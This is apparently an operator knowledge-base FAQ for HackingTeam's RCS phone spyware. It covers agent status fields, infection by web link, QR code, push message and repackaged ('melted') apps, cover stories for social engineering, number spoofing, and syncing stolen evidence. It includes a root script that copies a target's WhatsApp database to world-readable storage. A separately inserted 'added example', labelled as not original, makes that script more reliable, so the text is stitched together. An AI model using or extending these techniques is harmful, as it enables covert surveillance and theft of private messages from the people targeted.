]HackingTeam[ KnowledgeBase Product
What does "Root Status: RUN, Result: GOT ALREADY" mean?

What does "Root: yes, Su: no, Admin: no, Persistence: not required" mean?

The Persistence field reports the state of the persistence module, which depends on whether persistence is required by the configuration and on whether root is available:

- If persistence is required, the starting state is "required, to be installed". If root is available, the agent tries to install the persistence module; the result can be one of:

o failure: the installation failed;
o present, not yet rebooted: installed, but a reboot is required before it becomes active;
o present: already installed and the device has rebooted.

- If persistence is not required, the field simply reports "not required".

In the details of the targets I see TIMEOUT. What does it mean?
  • Timeout indicates that the sync process did not complete.

In the details of the targets I see: UNAVAILABLE. What does it mean?
  • Unavailable simply means that the agent was not able to retrieve the phone number from the SIM.

What can we do if the cp command is not available?
  • The cp command is not always present on the phones. As an alternative you can use shell redirection, but you cannot do it directly from Command; you need to write a shell script, upload it to the target device and run it via File Transfer/Upload and Execute. Here is an example of a script you can use:

#!/system/bin/sh
# Copy the WhatsApp database to the SD card with cat + redirection instead of cp.
mkdir -p /sdcard/WhatsApp/
cat /data/data/com.whatsapp/databases/wa.db > /sdcard/WhatsApp/wa.db
chmod 777 /sdcard/WhatsApp/wa.db

!!! ⇒ The commands are run as root both when sent as a Command and via Upload and Execute. The difference is that Commands cannot be chained with pipes and do not handle redirection, so each complex operation should be performed in a script.
!!! ⇒ The fact that the file-system scan runs with user permissions is not a bug; it is a system feature. It will be improved in the future, but it is neither urgent nor classified as a bug.
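As an added example, not part of the original KB page: a more defensive version of the cat-redirection workaround above, written as a script to be uploaded and run via Upload and Execute. It assumes a POSIX-style shell (Android's /system/bin/sh) with mkdir, cat, chmod and wc available; the function name, the size check and the sample paths are assumptions for illustration, not part of the product.

```sh
#!/bin/sh
# Added example (not from the original KB page): copy a file on a device whose
# shell has no `cp`, using only mkdir, cat, chmod and shell redirection, and
# verify that the copy is complete. Intended to be uploaded and run via
# Upload and Execute; the function name and the sample paths are assumptions.

# copy_without_cp SRC DST
# Exit status: 0 = copied and verified, 1 = source unreadable or target
# directory not creatable, 2 = copy incomplete (size mismatch).
copy_without_cp() {
    src=$1
    dst=$2
    dstdir=${dst%/*}          # parent directory without relying on dirname

    [ -r "$src" ] || { echo "source not readable: $src" >&2; return 1; }

    # -p is idempotent: a plain mkdir fails when the directory already exists,
    # which would make a second run of the script misleading.
    mkdir -p "$dstdir" || return 1

    # The actual workaround: cat + redirection instead of cp.
    cat "$src" > "$dst" || return 2

    # Verify the copy: a truncated or empty file is worse than an error.
    # Assumes wc is present; use [ -s "$dst" ] as a weaker check if it is not.
    srcsize=$(( $(wc -c < "$src") ))
    dstsize=$(( $(wc -c < "$dst") ))
    [ "$srcsize" -eq "$dstsize" ] || {
        echo "incomplete copy: $srcsize vs $dstsize bytes" >&2
        return 2
    }

    # The KB script makes the copy world-readable/writable so it can be picked
    # up afterwards; tighten this if the collector only needs read access.
    chmod 777 "$dst"
    return 0
}

# Stand-alone demonstration on a constructed file, so the script can be run
# on any POSIX shell without a target device.
demo() {
    work=${TMPDIR:-/tmp}/copy_demo.$$
    mkdir -p "$work"
    printf 'constructed sample database contents\n' > "$work/wa.db"
    copy_without_cp "$work/wa.db" "$work/sdcard/WhatsApp/wa.db"
    rc=$?
    rm -rf "$work"
    return "$rc"
}
```

The exit status is what makes this usable from Upload and Execute: the KB script above silently produces an empty or missing file if the source path is wrong or the partition is full, whereas this version reports 1 or 2 so the operator can tell a failed copy from a successful one.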

If the queue of evidence to be sent from the target to the server is overloaded and causes transfer problems:
  • Run the purge operation on the target (this action obviously resets the transfer of the evidence currently in the queue, which is lost).

What if I create a new factory and infect the phone again without knowing whether it was previously infected? Will it work?
  • If the factory belongs to the same customer (i.e. the same server), you cannot install two agents on the same device.

  • You have to make sure that a previous agent is not installed.

Is it possible to hide or mask/spoof a cell phone number (and perhaps its IMEI) so that an SMS sent to a target appears to come from another number?
  • RMI cannot change these parameters. To do that you need to use a service such as those offered by Carro or Circle or, alternatively, one of several online services that offer this feature. In any case, success or failure also depends on the telephone operator.

  • A good approach to limit the exposure of an RMI installation is to use a Gold Phone Number; a gold number is a special, easy-to-remember phone number.
    Each country has a different policy, but almost every telco offers gold numbers, which can pass as "professional numbers" in a social engineering approach. Some telcos let you choose your number.

If an Android phone is infected through a melted app, should the real app be kept? If it is uninstalled, is the agent removed too?
  • If the melted app is removed, the agent is removed too. We are working on this.

  • If the agent is upgraded to the next release, the original melted application is uninstalled and replaced by the upgraded silent agent.

After activating the file-system scan (in root mode) we realized that many files were missing.
  • The file-system scan of the Android agent runs with user permissions even when root is available. To see the full contents, send an input command such as ls -l /data/data (or a script that copies the files you need into a folder), because input commands run with root permissions.

Can I put the address of the Android remote exploit in the URL of the PUSH message (Service Load)? Is it advisable to do so?
  • There should be no contraindications. However, remember that not all Android devices support the WAP stack (e.g. some HTC and some Motorola devices). Furthermore, the user can disable push messages; for this reason it is always recommended to run preliminary tests, both with Service Loading and with Service Indication.

What is the correct infection procedure and what are the configuration parameters?
  • The ZIP file generated by the console contains a TXT file with the web link and an image of the QR code associated with that link.

  • After entering the link on the target phone, start the download and proceed as with any silent installer. The collector destroys the link as soon as it has been downloaded.

  • You can customize some of the fields the target sees during the download: when the target opens the link (or scans the QR code), the download starts (it arrives as a request).

!!! ⇒ The configuration dialog has some input fields filled in by default; the choice of values depends on the type of social-engineering attack the customer is using. The default settings are intended to simulate the delivery of an update. In some cases it may be more sensible to simulate an offer to optimise the tariff of a particular provider. The file name must also be consistent with the chosen cover story.

I infected a BlackBerry with the BASIC configuration via web link (infecting it with another vector should change nothing), but the phone will not synchronize. Why?

  • If you used the BASIC configuration to create the backdoor, by default the agent syncs only via Wi-Fi (not via the phone's data connection). If the infection was made through a web link, it is assumed you used a 3G connection. If this is the case, the phone cannot sync without a Wi-Fi connection. Also consider that the BlackBerry synchronizes only when the screen is off; when the phone is charging (in some configurations) its screen stays on to display the clock, and in these conditions the sync cannot take place.

  • If Wi-Fi is not configured, in RCS versions before 9.6 the BB can sync only via APN. Since RCS 9.6, the BB can use a free RIM channel by enabling the "force cell" flag in the sync configuration parameters.